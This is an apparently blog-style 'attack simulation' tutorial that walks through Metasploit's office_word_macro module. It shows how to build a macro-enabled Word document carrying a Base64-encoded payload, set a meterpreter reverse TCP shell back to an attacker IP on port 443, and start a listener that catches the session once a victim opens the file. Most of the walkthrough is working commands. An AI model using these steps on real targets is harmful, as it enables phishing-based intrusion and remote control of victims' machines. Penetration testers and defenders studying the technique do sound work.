Attack Simulation: Malicious Office Document (Metasploit)

Attack Simulation: Malicious Office Document (Metasploit)

This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a specific CVE or vulnerability, instead it’s more of a feature-abuse in Office, and yet it’s still a popular type of social-engineering attack such as in ransomware.

By default, the module uses a built-in Office document (docx) as the template. It injects the Base64-encoded payload into the comments field, which will get decoded back by the macro and executed as a Windows executable when the Office document is launched.

Step 1: Start up the postgresql service and enter the Metasploit command line:

[email protected]:~# service postgresql start
[email protected]:~# msfconsole -q
msf >

Step 2: Select the Office_Word_Macro exploit:

msf > use exploit/multi/fileformat/office_word_macro
msf exploit(office_word_macro) >

Step 3: Select a payload to use:

There are two popular types of shells: bind and reverse. A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session.

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

msf > set payload windows/meterpreter/reverse_tcp

Options now need to be set so that the connection can be made back to the attacking system. Set the following two options:

 msf exploit(office_word_macro) > set LHOST (attacker IP)
msf exploit(office_word_macro) > set LPORT 443

Step 4: Execute the exploit:

[msf exploit(office_word_macro) > exploit

You should now see progress in the metasploit console and see a location where it has saved the malicious word document. This now needs to be transferred to the target machine.

Step 5: Start listening for the reverse TCP connection:

msf exploit(office_word_macro) > use exploit/multi/handler
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > run

This will now start listening for incoming connections on port 443. Once the document has executed successfully on the target machine, you will see an active session and the exploit is complete.

Leave a Comment